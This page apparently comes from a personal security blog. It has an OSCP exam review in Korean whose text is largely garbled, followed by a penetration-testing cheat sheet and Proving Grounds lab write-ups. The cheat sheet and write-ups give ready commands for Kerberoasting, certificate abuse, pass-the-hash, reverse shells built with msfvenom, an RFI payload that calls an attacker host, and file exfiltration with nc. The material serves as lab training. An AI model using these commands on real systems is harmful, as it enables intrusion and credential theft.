Subsections of Home
Posts
Cheat Sheets & Tips
Subsections of Posts
Misc
Misc
Subsections of Misc
OSCP review
OSCP ํ๊ธฐ
์ด๋ฒ์ ๋๋์ด OSCP์ ํฉ๊ฒฉํ๋ค.
๊ฒฐ๊ณผ๋ 70์ ์ผ๋ก stand alone ๋จธ์ 3๋ (60์ ) + AD (10์ )์ผ๋ก ํฉ๊ฒฉํ๋ค.
์ ๋ฒ์ ๋จ์ด์ก์ ๋๋ 60์ ์ด์๊ณ , AD (40์ ) + stand alone (20์ )์ด์๋ค.
์ด๋ฒ์๋ ์ ๋ฒ์ฒ๋ผ AD๊ฐ ์ฝ๊ณ standalone ๋จธ์ ์ด ์ด๋ ค์ธ ์ค ์์๋๋ฐ ์์๋ ๋ชปํ ํจํด์ผ๋ก ํฉ๊ฒฉํ๋ค.
Background
์ฐ์ ๋ด ๋ฐฑ๊ทธ๋ผ์ด๋๋ฅผ ์ค๋ช ํ๋๊ฒ ์ข์ ๊ฒ ๊ฐ๋ค.
ํ์ฌ ์ผ๋ณธ์ ๋ณดํํ์ฌ์์ ๋ ๋ํ ๋ฉค๋ฒ๋ก ๊ทผ๋ฌดํ๊ณ ์๊ณ , penetration tester์ ๊ฒฝ๋ ฅ์ 1๋ ์กฐ๊ธ ๋์๋ค.
๊ทธ ์ ๊น์ง๋ SOC๋ ์ธํ๋ผ, ์น ๊ฐ๋ฐ ์ ๋ฌด๋ค์ ๋ด๋นํ์๋ค.
OSCP ์ ์ ๋ณด์ ํ๊ณ ์๋ ๋ณด์ ๊ด๋ จ ์๊ฒฉ์ฆ์ CISSP, PJPT๊ฐ ์๊ณ ์์ํ CVE๊ฐ 3๊ฐ ์ ๋ ์๋ค.
์ํ ๋์ด๋
์ด์ฐจํผ ์ํ์ ๋ด์ฉ์ด๋ ํฉ๊ฒฉํ๊ธฐ ์ํ ๊ฒฝ์ฐ์ ์ ๊ฐ์ ์ ๋ณด๋ ๋ง์ผ๋ ๋ฐ๋ก ์ํ์ ๋ํด ์๊ธฐํ๋ ค๊ณ ํ๋ค.
๋์ ๊ฒฝํ๊ณผ ์ฃผ๋ณ OSCP ํฉ๊ฒฉ์๋ค์ ๊ฒฝํ๋ด์ผ๋ก ๋ฏธ๋ฃจ์ด๋ณผ ๋ ์ํ์ ๋๊ฐ์ง ํจํด์ด ์๋ ๊ฒ ๊ฐ๋ค.
- AD๊ฐ ์ฝ๊ณ stand alone์ด ์ด๋ ค์ด ๊ฒฝ์ฐ (๋ด๊ฐ ์ ๋ฒ์ ๋จ์ด์ง ํจํด)
- AD๊ฐ ์ด๋ ต๊ณ stand alone์ด ์ฌ์ด ๊ฒฝ์ฐ (์ด๋ฒ์ ๋ถ์ ํจํด)
๋จผ์ ํจํด 1๋ถํฐ ์๊ธฐํ๋ฉด, ์ ๋ฒ ์ํ ๋ AD๋ ๋๋ฌด ์ฌ์ ๋ค. Enumeration์ด ๊ทธ๋ ๊ฒ ์ด๋ ต์ง๋ ์์๊ณ ์ด๋ป๊ฒ ๋ค์ ๊ณต๊ฒฉ์ผ๋ก ์ด์ด๊ฐ์ผ ํ ์ง ๋ปํ ๋ณด์๋ค.
์ค์ ๋ก AD์ ํ๋๊ทธ๋ฅผ ์ ๋ถ ํ๋ํ๋๋ฐ (40์ ) 2-3์๊ฐ ์ ๋ ๊ฑธ๋ ธ๋ ๊ฒ ๊ฐ๋ค.
๊ทธ๋ฐ๋ฐ stand alone์ด ๋ง๋ ์๋๊ฒ ์ด๋ ค์ ๋ค.
1๋๋ user, root ํ๋๊ทธ๋ฅผ ํ๋ํ๋๋ฐ, ๋๋จธ์ง 2๋๋ ์ด๊ธฐ์ง์ ๋ ๋ชปํ๊ณ ๋๋ฌ๋ค.
60์ ์ ์ํ ์์ํ๊ณ 5์๊ฐ ์ ๋์ ํ๋ํ๋๋ฐ, ๊ทธ ๋ ๋น์ฐํ ๋ถ์ ์ค ์๊ณ ์ฌ์ ๋กญ๊ฒ ์ํ๋ณด๋ค๊ฐ ๊ฒฐ๊ตญ ๊ทธ๋๋ก ๋๋์ ๋ฉํ์ด ํฐ์ก์๋ค.
์ด๋ฒ์ ๋ณธ 2๋ฒ ์งธ ํจํด์ ๊ฒฝ์ฐ์๋ ์ ๋ฐ๋์๋ค. AD ์ธํธ ๋จผ์ ์์ํ๋๋ฐ ์ฒ์ ๊ถํ ์์น ํ์ (10์ ) ๋์ ํ ์ด๋ป๊ฒ ํ์ด๊ฐ์ผํ ์ง ์ ์๊ฐ ์์๋ค.
์ ๋๋ก enumeration๋ ํ๋ค๊ณ ์๊ฐํ๋๋ฐ ์ ํ ๊ฐํผ๋ฅผ ์ก์ ์ ์์๋ค.
๊ทธ๋์ ์ฒ์๋ถํฐ ๋ฉํ์ด ๋ฐ์ด์ด ๋ ์ํ๋ก stand alone ๋จธ์ ์ผ๋ก ์ฎ๊ฒจ๊ฐ๋๋ฐ, ์ ๊ฑธ ๋๋ฌด๋๋ ์ฌ์ ๋ค.
rabbit hole๋ ์๊ณ ๊ทธ๋ฅ Easy ์ค์์๋ ์ฌ์ด ํธ์ ๋จธ์ ๋ค์ด์๋ค.
๊ทธ๋ ๊ฒ ๋งํ์์ด ์ฐ๋ฌ์ 3๋๋ฅผ ๋ค ํ์๋๋ 70์ ์ด ๋์๊ณ , AD๋ฅผ ์ข ๋ ์ดํด๋ดค์ง๋ง ์ฌ์ ํ ๋ชจ๋ฅด๊ฒ ์ด์ ์ํ์ ๋๋ด๊ณ ์ ์ ์ค๋ค.
๋ฆฌํฌํธ
์ํ์ด ๋๋๊ณ ๋ณด๊ณ ์๋ฅผ ์ฐ๋๋ฐ ์ ์๊ฐ ๋ฑ 70์ ์ด๋ผ ์ฌ๊ฐ ๋ถ์ํ๊ฒ ์๋์๋ค.
๋ญ๊ฐ ์๋ชป๋ผ์ 1์ ์ด๋ผ๋ ๊น์๋ค๊ฐ๋ ๊ทธ๋๋ก ๋จ์ด์ง ์ ์๊ธฐ ๋๋ฌธ์ด์๋ค.
๊ทธ๋์ ์ฌํ์ ๊ธฐ์ธ์ฌ ๋ณด๊ณ ์๋ฅผ ์์ฑํ๊ณ , ๊ณต์ ์ฌ์ดํธ์ ๋์์๋๋๋ก ๋ชจ๋ ์คํ ์ ์์ธํ ๊ธฐ๋กํ๋ ค๊ณ ๋ ธ๋ ฅํ๋ค.
๊ทธ๋ ๊ฒ ๋ณด๊ณ ์๋ฅผ ์ ์ถํ๊ณ ์ผ์ฃผ์ผ ์ ๋ ์ง๋ ๋ค์ ํฉ๊ฒฉํ๋ค๋ ๋ฉ์ผ์ ๋ฐ์๋ค.
๋ค๋ฅธ ํ๊ธฐ๋ค์ ๋์ฒด๋ก 3์ผ๋ด์ ํฉ๊ฒฉ ๋ฉ์ผ์ ๋ฐ์๋ค๊ณ ํ๋๋ฐ, ์ผ์ฃผ์ผ ๊ธฐ๋ค๋ฆฌ๋ ๋ด๋ด ๊ต์ฅํ ๋ถ์ํ์๋ค.
๊ฐ์ธ์ ์ธ ์๊ฐ
์ด๋ฒ์ ์ํ์ ๋ถ๊ณ ๋๋์ ์ ์ด์ด ๊ต์ฅํ ์ค์ํ ์์๋ผ๋ ๊ฒ์ด๋ค.
์์งํ ์ฒซ๋ฒ์งธ ์ํ๋ดค์ ๋๋ ๋๋ฒ์งธ ๋ดค์ ๋๋ ๋ด ์ค๋ ฅ์ฐจ์ด๋ ๊ทธ๋ ๊ฒ ํฌ์ง ์์๋ค.
์คํ๋ ค ์ฒซ ๋์ ๋๊ฐ ํจ์ฌ ๊ธฐํฉ์ด ๋ค์ด๊ฐ ์ํ์ฌ์ ๋ ์ข์ ์ปจ๋์ ์ด์์์ง๋ ๋ชจ๋ฅธ๋ค.
๋ด๊ฐ ๋๋ผ๊ธฐ์ ๋ ์ํ์์ ํฌ๊ฒ ๋ฌ๋๋ ์ ์ ๋จธ์ ์ ๋์ด๋์๋ค.
๊ทธ๋ฌ๋ ํน์ ์ด๊ฑธ ์ฝ๋ ์ฌ๋ ์ค์ ์ด๋ฏธ ์ํ์์ ๋จ์ด์ง ๊ฒฝํ์ด ์๋๋ผ๋ ํฌ๊ฒ ์ค๋งํ์ง ์๊ธฐ๋ฅผ ๋ฐ๋๋ค.
๋ค์๋ฒ์ ๋จธ์ ์ด์ด ์ข์ผ๋ฉด ๋๋ฌด ๊ฐ๋จํ ํฉ๊ฒฉํ ์๋ ์๊ธฐ ๋๋ฌธ์ด๋ค.
๊ทธ๋ ๋ค๊ณ 10์ , 20์ ์ผ๋ก ๋จ์ด์ง๋ฉด ๊ณค๋ํ๋ค. ๊ทธ๋ด ๊ฒฝ์ฐ ์์ง ์ค๋น๊ฐ ํ์ฐธ ๋ถ์กฑํ ์ํ์ผ ์ ์๋ค.
๊ทธ๋ฆฌ๊ณ ์ํ๋ด๋ด ๋๋ฅผ ๊ฐ์ํ๋ ๊ทธ ํ๋ก๊ทธ๋จ์ ๋ํด ์๊ธฐ๋ฅผ ์ ํ ์๊ฐ ์๋๋ฐ, ์ด๊ฒ ์๊พธ ๋ฒ๊ทธ๊ฐ ๊ฑธ๋ ธ๋ค.
์ํ์น๋ค๊ฐ ์ฌ๋ฌ๊ฐ๊ฑฐ๋ ๋ฐฅ์ ๋จน์ผ๋ฌ๊ฐ๊ฑฐ๋ ์๋ฌดํผ ์๋ฆฌ๋ฅผ ๋น์ธ ๋๋ ์ํ๊ด์๊ฒ ์ฑํ ์ผ๋ก ๋ณด๊ณ ๋ฅผ ํด์ผํ๋๋ฐ, ๊ณ์ ์ฑํ ์ด ๋ณด๋ด์ง์ง ์์์ ๊ทธ๋ฅ ๋ฉ๋ชจ์ฅ์ ๋ฉ์ธ์ง ์ ๊ณ ํ๋ฉด์ ๋ณด์ด๊ฒ ํด๋๊ณ ์ฌ๋ฌ๊ฐ์๋ค.
ํ์ด์ง๋ฅผ ์๋ก๊ณ ์นจํ๋ฉด ์ฑํ ๊ธฐ๋ฅ์ด ๋ถํํ๊ธฐ๋ ํ๋๋ฐ, ๊ทธ๋ผ ๋ค์ ๋์คํ๋ ์ด ์ฒ์๋ถํฐ ๊ณต์ ํด์ผ๋๊ณ ๋ฒ๊ฑฐ๋กญ๋ค.
ํ?
OSCP ์ํ์ ํ์ด๋ผ๊ณ ํ๋ค๋ฉด, ์ด ์ํ์ ์ด๋ก ์ด ์๋ ์ค๊ธฐ ์ํ์ด๊ธฐ ๋๋ฌธ์ ๋๋๋ก ๋ง์ ๋จธ์ ์ ํ์ด๋ณด๋ ๊ฒ ๋น์ฐํ ์ค์ํ๋ค.
๋ปํ์ง๋ง ๋ณธ์ธ์ ์ฒดํฌ๋ฆฌ์คํธ์ ์นํธ์ํธ๋ฅผ ๋ง๋ค์ด ๋๋ฉด ๋ฐ๋ก๋ฐ๋ก ์ฐพ์์ ์จ๋จน์ ์ ์์ด์ ํธํ๋ค.
ํน์ ๋ฐ๋ก OSCP์ ๋์ ํ๋๊ฒ ์ด๋ ค์์ ๊ทธ๋ณด๋ค ํ๋จ๊ณ ๋ฎ์ ์๊ฒฉ์ฆ๋ถํฐ ์ฐจ๊ทผ์ฐจ๊ทผ ๋์ ํ๊ณ ์ถ์ ์ฌ๋์ด ์๋ค๋ฉด PJPT๋ผ๋ ์๊ฒฉ์ฆ์ ์ถ์ฒํ๊ณ ์ถ๋ค.
AD๋ฅผ ๋ฉ์ธ์ผ๋ก ๋ค๋ฃจ๋ ์๊ฒฉ์ฆ์ธ๋ฐ OSCP์ AD๋จธ์ ์ ๋ด์ฉ๊ณผ ๊ฑฐ์ ๋ฒ์๊ฐ ๊ฐ๊ณ ๊ฐ์ ๋ด์ฉ๋ ์ดํดํ๋๋ฐ ๋ง์ ๋์์ด ๋๋ค.
๋ค์ ์๊ฒฉ์ฆ
๋ค์ ์๊ฒฉ์ฆ์ผ๋ก๋ OSEP์ ๋์ ํ๊ธฐ ์ ์ CRTO๋ผ๋ ์๊ฒฉ์ฆ์ ๋จผ์ ์ทจ๋ํ ๊ณํ์ด๋ค.
์ด๊ฒ๋ AD๊ฐ ๋ฉ์ธ์ธ๋ฐ, C2์๋ฒ๋ฅผ ์ด์ฉํ๊ณ ์ต๋ํ ๊ฐ์ง๋์ง ์๋๋ก ํดํน์ ํด์ผํ๋ค๊ณ ํ๋ค.
์ฌ์ค ์ง๊ธ ๊ณต๋ถ์ค์ธ๋ฐ, ๋ค๋ฅธ ์ฌ๋๋ค์ ์ฝ๋ค๊ณ ํ๊ธธ๋ ๋๊ธํ๊ฒ ํ ๊ฒธ ์์ํ๋ค๊ฐ ์๊ฐ๋ณด๋ค ์ด๋ ค์์ ๊ณ ์ ์ค์ด๋ค.
Webshell
php
Cheatsheet
Kerberos
Kerberoasting (service account)
- linux
- windows
hashcat:
hashcat -m 13100 hash.txt /path/to/wordlist -r /usr/share/hashcat/rules/best64.rule
AS-REP Roasting (user account)
- windows
- linux
- with userfile option (when only usernames are known)
hashcat:
hashcat -m 18200 hash.txt /path/to/wordlist
Golden ticket
krbtgt hash is required.
- From mimikatz
or get a shell using Psexec
pre2k
- enum pre2k machines
nxc ldap retro.vl -u 'trainee' -p 'trainee' -M pre2k
When the machine name is
BANKING$, then the default password isbankingchange the password
impacket-changepasswd 'retro.vl/BANKING$@10.129.234.44' -newpass 'Password1!' -p rpc-samr
- export the ccache file
export KRB5CCNAME=/home/parallels/.nxc/modules/pre2k/ccache/banking.ccache
AlwaysInstallElevated
- msi file executed as admin
- move it to the target server and just run it.
Windows privileges
SeImpersonatePrivilege
potato
SeBackupPrivilege
- copy SAM and SYSTEM files
- download to kali machine
- extract local credentials
- extract domain credentials
- rocopy with the backup privilege
SeRestorePrivilege
https://oscp.adot8.com/windows-privilege-escalation/whoami-priv/serestoreprivilege
SeManageVolumePrivilege
Execute the tool
SeDebugPrivilege
- Prepare procdump.exe
- Run cmd as admin
- Run mimikatz as admin
GPO
ReadGMSAPassword
- target: svc_apache
GenericAll on Computer
- add a fake computer
- Delegate role
GenericAll on User
- can change the target password
ForceChangePassword
GenericWrite
WriteOwner
- make the user (anirudh) owner of the policy.
- give all privileges to the user
- Add the user to local admin using SharpGPOAbuse.exe
- Can be done from linux as well. Add a domain user and add to the domain admin group.
Use the CN for -gpo-id option.
- Update the policy from target machine.
AllExtendedRights
- import powerview
- reset password
getchanges, getchangesall
- can perform DCsync
mimikatz
- one liner
wildcard injection
tar
- create shell.sh file
- create checkpoint options
7za
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log
- link a file of interest
- check the log file after executed
nxc
ldap
- grep accounts
- grep description
- make a userlist
- asrep roasting
- kerberoasting
smb
slinky
- When a user has write permission on share
set up responder
use slinky moudle. Automatically make a lnk file and locate it in a writable share
ldapsearch
- make a user list
- enum all properties
SMB
smbpasswd
- when SMB error message says “user must change password”
webdav
davtest
- find uploadable file type
- upload a file
SSH
remote port forwarding (target -> kali)
- forward port 80 and 14147
local port forwarding (kali -> target)
Impacket
impacket-secretsdump
It’s like a mimikatz that can be used remotely.
Admin priv accounts needed
- local admin
- domain admin
impacket-net
Prepare vaild domain credentials
- user enum
- user details
- create domain user
- enum via kerberos ticket
impacket-mssqlclient
- connection
impacket-mssqlclient "oscp.exam/sql_svc":Dolphin1@10.10.202.148 -windows-auth
- enable shell
enable_xp_cmdshell
- file upload (only upload)
upload ./148/rev.exe c:\windows\temp\rev.exe
impacket-secretsdump
- I thinks it’s more convenient than Mimikatz
impacket-secretsdump NIX01/Administrator:'mdm0axd*EQM7xmq.krn'@10.129.101.210
mysql
windows
- terminal oneliner
Bloodhound
Get domain information remotely.
Domain user account needed.
plumhound
Automatically analyze the result of bloodhound and make a report for me.
neo4j, bloodhound must be running.
WEB
git clone
- git clone with authorized token
git-dumper
- git-dumper dumps git repository to local.
even browser access to
/.gitis forbidden, it may still dump the repository
Joomla
When target web service using joomla
curl
- LFI examples
evilwin-rm
services: display running sc.exe servicesupload: upload a filedownload: download a file
runascs
- run as other users in windows
- used for privesc
Privileged groups
- check with
whoami /group
server operator group
- check running services.
servicescommand in case of evilwin-rm. - create a rev shell file using msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o rev.exe LHOST=10.10.15.99 LPORT=4444 - change the binary path of any target service.
sc.exe config VMTools binPath="C:\Users\svc-printer\Documents\rev.exe" - restart the service.
sc.exe stop VMToolssc.exe start VMTools
or alternatively, in the step 3, execute nc.exe binary.
CERTIPY-AD
- print out vulnerable certificate templates
certipy-ad find -username 'BANKING$' -password 'Password1!' -dc-ip 10.129.2.242 -vulnerable -enable -stdout
ESC1
- Enum the information of the target user
certipy-ad account -u 'BANKING$' -p 'Password1!' -dc-ip '10.129.2.242' -user 'administrator' read
- Request a certificate
certipy-ad req -u 'BANKING$' -p 'Password1!' -dc-ip '10.129.2.242' -target 'DC.retro.vl' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500'
- below error happens when the key-size is different
- in the case of key size error
certipy-ad -debug req -u 'BANKING$@retro.vl' -p 'Password1!' -dc-ip '10.129.2.242' -target 'DC.retro.vl' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096
- Authentication with the created certificate
certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.129.2.242'
- Access with the created hash
impacket-psexec retro.vl/administrator@retro.vl -hashes :252fac7066d93dd009d4fd2cd0368389
ESC8
Add DNS Name to the /etc/hosts file
Check which coerce tool is available (optional)
- Certipy relay
- Coerce (Force) DC to be involved
pfxfile is created. Certipy auth with the pfx file.
NTLM hash is displayed.
- DCsync with the hash
sudo
- check sudo privilege.
sudo -l
- run sudo as other users
sudo -u username
postgres
- login
psql -h 127.0.0.1 -d register_hetemit -U railsdev
systemd
When there is a writable file in the systemd directory.
change to root user, add payload and reboot so that the script can be run
Linux Group
disk group
uid=1001(user1) gid=1002(user1) groups=1002(user1), 6(disk)
disk group members have raw read / write access to block devices.
check the mount
- Access to the mount using
debugfs
docker group
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
- Check available images (when there is no internet conenction)
rbash
Magic byte
hexedit
sudo hexedit $file
- save : crtl+x
NFS
- check the share
showmount -e 10.1.156.207
- mount to kali machine
Username-anarchy
Collect usernames from web server or any other sources and make a user list.
Input the user list to make combination of potential usernames
The result can be used for asrep roasting
Active Directory
Active Directory cheatsheet
Subsections of Active Directory
Serestoreprivilege
SeRestorePrivilege
When an account has SeRestorePrivilege, it can be leveraged to achieve privilege escalation by overwriting protected system files.
- Obtain the required script
Download the following script, which enables the privilege in the current session:
script file.
- Enable the privilege and replace Utilman
Execute the script and abuse the privilege to replace Utilman.exe with cmd.exe:
This works because SeRestorePrivilege allows bypassing file permissions when writing to system locations.
- Connect via RDP
From a Linux machine, connect to the target using RDP:
- Trigger SYSTEM shell
On the login screen, click the Ease of Access button. Since Utilman.exe has been replaced, this will launch cmd.exe with SYSTEM privileges.
AD Gmsapassword
GMSAPassword
When a user has adGMSAPassword permission over a target account, it is possible to retrieve the managed password and derive usable credentials for authentication.
Abuse workflow
- Identify GMSA permissions
If your account has adGMSAPassword rights over a Group Managed Service Account (gMSA), you can extract its password material.
- Prepare the extraction tool
Use a tool such as gmsapasswordreader.exe to retrieve the password data.
Transfer the binary to the target machine (in this case, enox) and execute it:
- Authenticate using the retrieved hash
With the extracted NTLM (RC4) hash, authenticate as the gMSA account:
GenericAll permission on a domain computer
GenericAll permission on a domain computer
The user l.livingstone has GenericAll permission on the domain computer RESOURCEDC$.
GenericAll grants full control over the object โ including the ability to write to msDS-AllowedToActOnBehalfOfOtherIdentity. This makes Resource-Based Constrained Delegation (RBCD) abuse possible: we create a machine account we control, configure the target to trust it for delegation, then impersonate any user (including Administrator) to obtain a service ticket via S4U2Proxy.
Step 1 โ Add a fake computer to the domain
impacket-addcomputer creates a new machine account in the domain. We authenticate as l.livingstone using her NTLM hash.
Step 2 โ Configure RBCD on the target computer
Using our GenericAll rights, write fake$ into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of RESOURCEDC$. This tells the target to trust fake$ for delegation.
Step 3 โ Request a service ticket as Administrator
Using impacket-getST, perform S4U2Self + S4U2Proxy as fake$ to obtain a CIFS ticket impersonating Administrator.
Step 4 โ Export the ticket
Set the KRB5CCNAME environment variable so Impacket tools pick up the saved ticket automatically.
Step 5 โ Connect via psexec
Since we authenticate with Kerberos, the target’s hostname must resolve correctly. Add an entry to /etc/hosts if needed, then connect using the ticket.
WebDAV Exploitation with davtest
WebDAV Exploitation
WebDAV (Web Distributed Authoring and Versioning) is an HTTP extension that allows clients to perform remote file operations on a web server. When misconfigured, it can be a powerful attack surface โ especially if it requires only basic credentials or has loose upload restrictions.
WebDAV typically requires credentials to interact with.
Step 1 โ Enumerate Allowed File Types with davtest
davtest tests which file types can be uploaded and executed on the target WebDAV server.
The output shows both .aspx and .asp are executable โ meaning we can upload a web shell or reverse shell payload in either format.
Step 2 โ Generate a Reverse Shell Payload
Using msfvenom, generate an ASPX reverse shell:
Step 3 โ Upload the Payload
Upload the payload using the directory that davtest created in step 1:
Step 4 โ Trigger the Shell
With a listener ready, browse to the uploaded file to execute it:
The reverse shell connects back to the attacker machine.
Pivoting
ligolo-ng
- Set a proxy server
sudo ligolo-proxy -selfcert -laddr "0.0.0.0:7878"
- Create an interface
interface_create --name "evil-cha"
- Add route (Target’s internal network)
interface_add_route --name evil-cha --route 10.10.11.0/24
- Access to the proxy server from the target machine
./agent -connect 192.168.45.224:7878 -ignore-cert
- Check sessions from the proxy
session
- Start tunneling
tunnel_start --tun evil-cha
For local port forwarding. (3 machines case)
Make sure the tunnel has started
From ligolo-proxy add the port forwarding
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
Now the pivoting machine forwards inbound port (1234) to kali port (4444)
- Check with
listener_list
Dynamic port forwarding (2 machines case)
- To access 127.0.0.1 network of the target machine
- create an interface
ifcreate --name ligolo
- Add route 240.0.0.1
interface_add_route --name ligolo --route 240.0.0.1/32
- Connect from the target machine
.\agent.exe -connect :7878 -ignore-cert
- confirm session
session
- Start the tunnel
tunnel_start --tun ligolo
- Check the access
impacket-mssqlclient hack.smarter/alice.wonderland:'Password1!'@240.0.0.1 -windows-auth
File Transfer
SMB
set up SMB server on kali
impacket-smbserver test . -smb2support -user user -password 1234
Connect to the SMB from windows
net use Z: \\192.168.45.211\test /user:user 1234
nc
linux
file receiver
nc -lp 1234 > file.txt
file sender
nc -q 0 192.168.45.211 1234 < file.txt
windows
file receiver
nc -lp 1234 > file.txt
file sender
nc.exe -w 1 192.168.45.211 1234 < file.txt
http
linux
python3 -m http.server 80
windows
.\http-server.exe --ip 10.10.202.147 --port 8888
Stabilize a reverse shell
After getting a reverse shell, we can stabilize it using commands below.
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermctrl+zstty raw -echo; fgstty rows 38 columns 116
Writeup
Choose a category from the side menu!
Subsections of Writeup
Proving Grounds
Offsec’s proving grounds writeups.
Access writeup - An attacker achieve initial access by uploading crafted files. After getting the initial shell, other credentials found using kerberoast attack. Finally, An attacker can escalage privilege bu exploiting SeManageVolumePrivilege.
Heist writeup - Active Directory penetration testing walkthrough covering NTLM capture, gMSA password extraction, lateral movement with BloodHound, and privilege escalation using SeRestorePrivilege.
Nickel writeup โ Windows exploitation walkthrough covering HTTP enumeration, credential discovery via process listing, SSH access, PDF password cracking, and SYSTEM command execution.
A comprehensive writeup for the OffSec Snookums machine. Learn how to exploit an RFI vulnerability in SimplePHPGallery for an initial foothold, extract database credentials, and achieve root access by exploiting a writable /etc/passwd file.
Offsec proving grounds Squid writeup - A penetration testing walkthrough exploiting a Squid proxy to access internal services, gain phpMyAdmin access, upload a web shell, and escalate privileges using GodPotato.
Vault writeup - Learn how to escalate privileges in an Active Directory environment by exploiting SMB guest write access and GPO abuse. This walkthrough covers NTLM hash capturing with Responder, ntlm-theft, and leveraging SharpGPOAbuse to gain local admin rights on a Windows Domain Controller.
Zipper writeup - Linux exploitation walkthrough covering PHP zip wrapper abuse for initial access and privilege escalation through a vulnerable 7za backup cron job.
Subsections of Proving Grounds
Zipper
Port scan
Only SSH and HTTP are exposed. Since the web service is the most interesting attack surface, I started there.
Initial foothold
Web enumeration
Accessing the web page reveals a simple application with a file upload function.
After uploading a test file, I noticed that the application stores uploaded archives under the uploads directory with a generated filename such as upload_1777450472.zip.
The application also accepts a file parameter and includes the requested file. Because the uploaded content remains inside a ZIP archive, I tested PHP’s zip:// stream wrapper to include a file from inside the archive.
I created a small PHP web shell named zipper:
Then I uploaded it.
The file can be reached through the ZIP wrapper by using the uploaded ZIP path and the internal filename. The # separator must be URL-encoded as %23.
After confirming command execution, I used busybox nc to catch a reverse shell.
Privilege escalation
After getting a shell as www-data, I transferred and ran pspy to look for scheduled tasks. A root-owned cron job was executing /opt/backup.sh.
The script contains the following logic:
The vulnerable part is the *.zip wildcard passed directly to 7za. The 7za utility supports list files through the @filename syntax. If a file named @root.zip exists in the working directory, 7za treats root.zip as a list file instead of a normal archive.
Since /var/www/html/uploads is writable by www-data, I created a list-file trigger and pointed root.zip to /root/proof.txt.
When the cron job runs, the shell expands *.zip, and 7za processes @root.zip. This causes 7za to read the symlinked /root/proof.txt as a list file. Each line from the root-only file is interpreted as a path to archive.
Those interpreted paths do not exist, so 7za writes warnings to /opt/backups/backup.log. Because the warnings include the missing “filenames”, the contents of /root/proof.txt are leaked into the log.
The root flag is exposed in the backup log.
Snookums
port scan
initial foothold
Upon navigating to the web interface, I identified the version of the underlying framework.
Researching this specific version revealed that version 0.7 is vulnerable to RFI vulnerability.
Through further testing, I confirmed that this vulnerability persists in version 0.8 as well.
To gain an initial shell, I prepared a PHP reverse shell script on my local attacker machine. I then leveraged the RFI vulnerability by pointing the img parameter to my hosted shell:
http://<TARGET_IP>/image.php?img=http://<ATTACKER_IP>/revshell.php
Executing this request triggered the reverse shell, granting me initial access to the victim server as the Apache user.
Privilege escalation
apache -> michael
While enumerating the web root directory, I discovered a database configuration file containing hardcoded credentials:
Using these credentials to access the local database, I extracted the users table, which contained several Base64-encoded passwords:
After decoding the strings, I successfully retrieved the cleartext password for the user michael:
HockSydneyCertify123
michael -> root
After switching to michael via SSH, I ran linpeas.
The results highlighted the /etc/passwd file was writable.
I exploited this by appending a new user with root privileges (UID 0) to the passwd file:
Finally, switch user to r00t with the password.
Squid
initial foothold
Nmap scan
The scan results show that a Squid proxy is running on port 3128.
enumeration
When accessing port 3128, only an error page is displayed.
At first, I had no idea what to do with this port. While researching, I found an article about enumerating Squid proxies.
According to the article we can use the tool spose.py.
This revealed that ports 3306 and 8080 were also accessible. These ports can be reached through the proxy.
I configured proxy settings in FoxyProxy, pointing it to port 3128, and then attempted to access the web application.
From the landing page, I found a link to phpmyadmin page.
I tried the default credentials:
root / ''
and successfully logged in.
exploitation
Using SQL statements, We can read and wirte files if we have sufficient privileges..
Since I logged in as root, I had the necessary permissions.
For example, we can read a file using:
And write a file using:
Web serverโs root directory
The root directory for WAMP is C:/wamp/www.
After executing the command, navigate to the URL to confirm that it works.
Nice! Now we can upload a reverse shell and execute it.
privilege escalation
At this point, we still couldn’t access the Administrator folder.
Check user privileges.
The account has the SeImpersonatePrivilege, which is commonly exploitable.
I moved nc.exe and godpotato.exe to target using web server.
The user has write permissions to the directory:
C:\wamp\tmp
I downloaded the files using certutil:
Finally, I obtained a reverse shell with SYSTEM privileges.
Heist
initial foothold
NMAP scan
From the scan results, we can see that this machine is a Domain Controller. Several Active Directoryโrelated services are exposed, including LDAP (389), Kerberos (88), SMB (445), and Global Catalog (3268).
One interesting service is running on port 8080, which appears to be a web application powered by Flask.
enumeration
WEB
The web page contains a URL input field. To test whether the application makes outbound connections, I entered my own IP address and monitored for incoming traffic.
Using Responder, I was able to capture NTLM authentication from the user enox.
Cracked the hash using hashcat:
Credentials recovered: enox / california
lateral movement
I used evil-winrm to log in.
On the Desktop, I found a file named todo.txt:
This suggests that Apache is configured to use a Group Managed Service Account (gMSA).
Looking in C:\Users, I found a service account:
Service accounts often have elevated privileges, making this a promising target.
Bloodhound
I ran BloodHound to analyze privilege escalation paths.
BloodHound revealed that the user enox has the ReadGMSAPassword permission over svc_apache$.
This means we can retrieve the managed password for that account.
Using gmsapasswordreader.exe, I extracted the password hashes:
Using Pass-the-Hash:
evil-winrm -i 192.168.115.165 -u svc_apache$ -H B4A3125F0CB30FCBB499D4B4EB1C20D2
Do not forget the $ at the end of the username.
Authentication will fail without it.
privilege escalation
Checking privileges:
I confrimed the user has SeRestorePrivilege.
This privilege allows restoring files and directories, which can be abused to overwrite protected system files.
In the Documents folder, I found a PowerShell script referencing:
It’s telling us to check the github for privsec.
Abusing SeRestorePrivilege
According to the guidance:
Okay, according to the note, we will replace utilman.exe file to cmd.exe file.
Then by interacting with GUI somehow, the cmd.exe will be executed instead of utilman.exe which is suppposed to.
Then I opened remote desktop to interact.
From the login screen, clicking the Ease of Access (Utility Manager) icon launches utilman.exe.
Since we replaced it with cmd.exe, a SYSTEM shell is spawned.
We now have full SYSTEM access on the Domain Controller!
Vault
initial foothold
nmap
I started by checking for guest access on the target machine.
enumeration
SMB
I checked that I have a guest access.
The output confirmed that I have READ/WRITE permissions on the DocumentsShare.
Since I have write access, I can attempt to capture an NTLM hash by forcing a user to authenticate to my machine.
I used ntlm-theft to generate a set of malicious files. If a user interacts with any of these files, Responder will capture their hash.
exploitation
- Craft the payload.
- Start Responder
- Upload the files.
